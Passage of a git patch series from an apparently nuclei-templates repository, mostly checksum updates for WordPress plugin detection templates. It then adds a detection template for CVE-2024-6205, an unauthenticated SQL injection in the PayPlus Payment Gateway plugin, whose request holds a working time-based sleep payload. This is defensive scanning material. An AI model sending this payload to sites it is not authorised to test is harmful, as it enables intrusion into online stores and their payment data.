-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:477abfd345f5e569cca93689579a5b055a665262 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:0fabd8dce69dcf1b80b58f71fb63a16d6ef23250 +http/technologies/wordpress/plugins/mailpoet.yaml:91740d9b6a4511a8ea08c78484d88df130d09f00 +http/technologies/wordpress/plugins/maintenance.yaml:d57c17bb81ed1e25353f9f1774b8cc2a7b7b0996 +http/technologies/wordpress/plugins/mainwp-child.yaml:a20bfac6e63da2f1a813020047b2da74e4566c30 +http/technologies/wordpress/plugins/malcare-security.yaml:61159b8895d00dac0e0b1b33f7b3f81f4c8040bc +http/technologies/wordpress/plugins/megamenu.yaml:ec28177dc10b6f9e1cdd20cc95c694b0b630d2b8 +http/technologies/wordpress/plugins/members.yaml:5e4287b8ca825800f3ee610b37cbd559abff1793 +http/technologies/wordpress/plugins/meta-box.yaml:ea167653ccc5aea1aac8970081ebc7400d0497b5 +http/technologies/wordpress/plugins/metform.yaml:b5e8b8a0a1f43c85c522361c4f7100438b3322d7 +http/technologies/wordpress/plugins/ml-slider.yaml:b32b60ead0bd5a0f7ebc3b67021df9b7afca20f9 +http/technologies/wordpress/plugins/newsletter.yaml:1cae13de60afb39d7ce178b7a486ed320011faed +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0852aa65ccd67fdc483f1ff49b7a6d0ae19c2c52 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:dc0ee42d4623d853aac3377e48d812620eb4ec15 +http/technologies/wordpress/plugins/ninja-forms.yaml:e590b14f92309937dd9c08d93af94070e0bb8f55 +http/technologies/wordpress/plugins/ocean-extra.yaml:ebc1df6ef1e98d381cc7985f35ed5aec0a757a30 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:d56008cc51a4a3a4c3b08f7d443d60d28847b491 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:5850e45bf0179e4d48256c86fbf9087afd526835 +http/technologies/wordpress/plugins/optinmonster.yaml:4016409e25a586d9123695d637cdf02c47113f85 +http/technologies/wordpress/plugins/otter-blocks.yaml:9e49328f627d334aed69dd67fd57843f846e9688 +http/technologies/wordpress/plugins/password-protected.yaml:e97f80ef662eede217fb917d56bd774f4133b65b +http/technologies/wordpress/plugins/pdf-embedder.yaml:730afebf69e20ba27146f8889187fecb66091af1 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:7efa5202c67f212a01e0a3c81b09d04575640ec0 +http/technologies/wordpress/plugins/pixelyoursite.yaml:5e4f14505bb2be9b416ac16c160b58dab63b736a +http/technologies/wordpress/plugins/polylang.yaml:7d1b5874a1a449134b1782442381725afa73cbf9 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:59de727417f2ecc0db96d892f95279d827a25070 +http/technologies/wordpress/plugins/post-smtp.yaml:d085a82190d8057f9ad3e5eb947aec061c5da56b +http/technologies/wordpress/plugins/post-types-order.yaml:b30d7763cad1f2f4acc53f8a13623c2f4361a636 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:58982937a22d1d7078c2874c0bcf2d4f44832917 +http/technologies/wordpress/plugins/pretty-link.yaml:6a84fb469a2770f1ad48eb3dafa37ed36f48d654 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:b5cc6a5c35486eec75a84ef468231ff809ae0e95 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:95f21f302bbb582f62545cd4dbc5c24bb1e9b429 +http/technologies/wordpress/plugins/redirection.yaml:7522398dd8097c616b885c63c0f103ff05093364 +http/technologies/wordpress/plugins/redux-framework.yaml:7aaa7cafdb24b021b122698700464fdcbe3e6890 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:ef9887ab180fe86e6b1252df691087d8cc199009 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:2a4c9251b584f67f8c74fb4f57f0515c88872ae6 +http/technologies/wordpress/plugins/safe-svg.yaml:34dd5ae54aa6e19b1e8f3980a2414a1b2c9c901e +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:cf222ca4ed6679bede955b36f93b217851bd735e +http/technologies/wordpress/plugins/sg-cachepress.yaml:3a0071f98c62e93535af360c3c95201dc696f654 +http/technologies/wordpress/plugins/sg-security.yaml:f6532bb829d9c9fc1d18342457a3196ecbcecf6b +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:6b7c4924258f23a938d9f5509aa12cdb315fa467 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:44cffc8fb5c42cde1345c23e5073b425deffb4e9 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:b6f775c85aa67f40c8beca5f10e4ff30ceb850b2 +http/technologies/wordpress/plugins/simple-history.yaml:19c9c7b8529177605998947ddeb9e134cc40d268 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:683735ec9e0a71b7316eba44eebdcf948e36b7ae +http/technologies/wordpress/plugins/siteorigin-panels.yaml:70d84f0aa8181d8fe7e1b3cfabff5c11d0053bf6 +http/technologies/wordpress/plugins/smart-slider-3.yaml:152e995d77855dca677b708076568d8d33bc4214 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:169f9a890ccec0e6724ef21c0ec1fc46b0d1f1c8 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:05f24d893d16a6da8d7adf8f632cc42c6b8037cc +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:c7f4ae61eaba574db1a02efdca46d0b4ef65f36b +http/technologies/wordpress/plugins/sucuri-scanner.yaml:319e39749e03bbda34fc55e1c5568dfb3d685637 http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:de80c7e7e30522e92252bfcb554b774266ff8e07 +http/technologies/wordpress/plugins/tablepress.yaml:298ba6841daf785708bdfbc6a440b275ed1525ec +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:012f163ff24eb301fb02549f2d3294e10969d63c +http/technologies/wordpress/plugins/templately.yaml:0f27f8c72ee15b2a964d1bfa8f353d3a821746d1 +http/technologies/wordpress/plugins/the-events-calendar.yaml:8f9e90453856bd32b41e4f436024559581b4e9f7 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:cddb817075e67dde5e8b6f03e0d3e25e5e20186c +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a21029db7bbe67ad7a80da36922f11f7ddbef08e +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:1dba72949dc1fcf43574e7a2a8c22b1e6f28422d +http/technologies/wordpress/plugins/under-construction-page.yaml:a1d2d60f80770f8e354f7f48757c25c21f84b82a http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:d4af07d3c0bb5bdefb7da78c149f381e5b3a4837 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:1e7c4990a7000ccf0bc238e92b3ae32ab63dcbcb http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:98033211cf6560ee35c6baeeaa9f3e674a7e12e2 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:7e572171b269448e711c7a3c650605fabe895430 +http/technologies/wordpress/plugins/webp-express.yaml:4e7dc51f2f6a8fb4525a39dc1cd0a3ffa0ef7333 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:aeae28a77d0d921d2a0eef9f8785c853d17b0cd0 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d0bb68053734e30e68ef51861bcf4b85613b1d75 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:3f573cb869fb297b4de255da6d31d56bddd7a738 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:71acfc857a12d01acd22ae898c97f9ffb1789a72 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:58d9f59e05e6596acc1cf05d45ec13e4b237c373 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:90067117309042297bdcec3c6320ad1ee9fe789a +http/technologies/wordpress/plugins/woocommerce-payments.yaml:89b8df052c3b7072463571be75177cecbf3dcdba +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:1bd5852cf7944bf7c1d6cea04442177d558c3ccd +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:78ed9faf3748e089154fe7f28e21b986c418efad +http/technologies/wordpress/plugins/woocommerce-services.yaml:d9ac95c11b0610acca7bb38a8c703143193f2bc2 +http/technologies/wordpress/plugins/woocommerce.yaml:4824ca71fbd1b7d9e1ce07646cd2fc36fa3ba19c +http/technologies/wordpress/plugins/wordfence.yaml:08bfdcb49e66e5c2229f1456f2cd1f3248fa7d21 +http/technologies/wordpress/plugins/wordpress-importer.yaml:3752870c70967cc9904cddb2f9a940a261895cda +http/technologies/wordpress/plugins/wordpress-seo.yaml:9322789c80f5ba317a826dd6e87602991232dd94 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:9c906ca14926936e06890257a74597d850e349a0 +http/technologies/wordpress/plugins/wp-crontrol.yaml:7f743706465219d90ff958d0686a23b51ec1aaa6 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:78560927e48df7f729de95460190c71b82e7c9d5 +http/technologies/wordpress/plugins/wp-file-manager.yaml:20810a1b80b2f2ee8aa7a264bdf7761582af5ea9 +http/technologies/wordpress/plugins/wp-google-maps.yaml:294f1052f902b0f93a6cbed1e7e3a411f0f3bc49 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:925a3942a85e02b5439c7c588c7207b04225e1b9 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:e21b4c8d88640528f665343eb0b43fc64df616e3 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:87236dd3689ff7625ca9a192a18d68efda54a191 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:bde2088b2f9d98b08251a21f74dcf983ddf05a51 +http/technologies/wordpress/plugins/wp-optimize.yaml:d4a352e5c39facd6b66ed46de7e97e7965edecc7 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:ec1253c722ad3a2b746a59aa03f472c985b0ff6b +http/technologies/wordpress/plugins/wp-reset.yaml:4fdb40e43e378f36165e746c9af79ae68d7d3978 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:7cee604af66dbc8904baf56424b74b39d7e23583 +http/technologies/wordpress/plugins/wp-rollback.yaml:8707ce8224bb4c20617712d4d3252dccae5c8aa3 +http/technologies/wordpress/plugins/wp-seopress.yaml:e8147b3da837d966c9cd3f864325a5638f3e55d3 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:39e20d7bc1926c1f639518e315cdef35f454ba3d +http/technologies/wordpress/plugins/wp-smushit.yaml:9116ee113f83112181435dac9317f1a764a2508b +http/technologies/wordpress/plugins/wp-statistics.yaml:408a25788027828aef4dbbc6cadd74228ab999c2 +http/technologies/wordpress/plugins/wp-super-cache.yaml:88c665c495ac5724c5ef2427f84e027a60149723 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:8a5840db0a8156898e494fad45f70d373ec6eaac +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:44ee0c34ea8320ec5f9b6b0ac317db29e9f8fec7 +http/technologies/wordpress/plugins/wpforms-lite.yaml:47c761b5b1b13410f6c8a2d1bb8771568bf6632d +http/technologies/wordpress/plugins/wps-hide-login.yaml:9986b205732013f2ec638379ee92c3fa231cbc18 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f69a3bec62d70c38fe4f30df112760fb13e301d0 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1bfaedcfecd5f5a14bf6b90214289f145799d041 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8901,7 +8901,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:80f06ced214f60b7d860d0808ef4c96bdf057aa4 +templates-checksum.txt:460d4f810e9197418a00e93243222b3920562b96 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 37cb7a57f8521350b96a4accfcb87513dbb1ff1b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 19 Jul 2024 11:28:54 +0000 Subject: [PATCH 1453/1841] Auto Template Signing [Fri Jul 19 11:28:54 UTC 2024] :robot: --- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2022/CVE-2022-0140.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 1049054121..276fa716f8 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -82,4 +82,4 @@ http: - 'status_code_2 == 200 && status_code_3 == 400' - 'len(body_2) == 2 && len(body_3) == 2' condition: and -# digest: 4a0a0047304502201a3e9663dc98735508040110a0f0778160d3bb3c76ea3246f73225c2bd7a22d8022100c3ad7ca4c44b23d865c8dbdd5ff2cc9d7a4172e04f03a427d9bbdcc18c2c5ef5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022046788f9af0f9a771807a7ff33952ef3914294574a8875f559557ef32b4ba7103022100a54400dacc01b9847188d6c9af9b2e9ff0e278297865b0ef0cb14a86f69c7de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 39215d225a..55e779e3aa 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220555e72b8a7ce8ba848bc013ba68905a0892db7854b4d5a487b4b342d5595b0cf0221009227b34829104b03a2a178ba1afc5c13f05c4db7f63a5971c34a3a95685fa9bb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210094ecbaa0e3ac781a418d224da0c83ecd9aa4bb1f5435952f856b8d6a8266e42a022100f56758fa6a035b7c3de85c68b70368a140d03b7566f13bbd5024e86b38cba445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1157e107966aad2c763f411fa6fce655669cd101 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 19 Jul 2024 21:36:26 +0300 Subject: [PATCH 1454/1841] add CVE-2024-6205 --- http/cves/2024/CVE-2024-6205.yaml | 50 +++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6205.yaml diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml new file mode 100644 index 0000000000..53a20adcd6 --- /dev/null +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-6205 + +info: + name: PayPlus Payment Gateway < 6.6.9 - SQL Injection + author: securityforeveryone + severity: critical + description: | + The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability. + remediation: Fixed in 6.6.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-6205 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6205 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection + - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087/ + - https://github.com/20142995/nuclei-templates + classification: + epss-score: 0.00043 + epss-percentile: 0.09301 + metadata: + max-request: 1 + vendor: PayPlus LTD + product: PayPlus Payment Gateway + framework: wordpress + publicwww-query: "/wp-content/plugins/payplus-payment-gateway" + tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin + +http: + - raw: + - | + @timeout 20s + GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 302' + condition: and + + - type: word + part: body + words: + - '-1' + + - type: word + part: content_type + words: + - 'text/html' From 2f1db087b7c356adf41c33f341cef79a07b10cce Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 19 Jul 2024 23:19:16 +0300 Subject: [PATCH 1455/1841] fix --- http/cves/2024/CVE-2024-6205.yaml | 12 +----------- 1 file changed, 1 insertion(+), 11 deletions(-) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index 53a20adcd6..d3566ca70b 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -31,20 +31,10 @@ http: GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: dsl dsl: - 'duration>=6' + - 'contains(body,"-1") && contains(content_type,"text/html")' - 'status_code == 302' condition: and - - - type: word - part: body - words: - - '-1' - - - type: word - part: content_type - words: - - 'text/html' From 96e6a7a3d29f2581dd0778cd0d6ac55056b8fc08 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 19 Jul 2024 23:30:24 +0300 Subject: [PATCH 1456/1841] reference --- http/cves/2024/CVE-2024-6205.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml index d3566ca70b..b1c16d041a 100644 --- a/http/cves/2024/CVE-2024-6205.yaml +++ b/http/cves/2024/CVE-2024-6205.yaml @@ -11,8 +11,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-6205 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6205 - 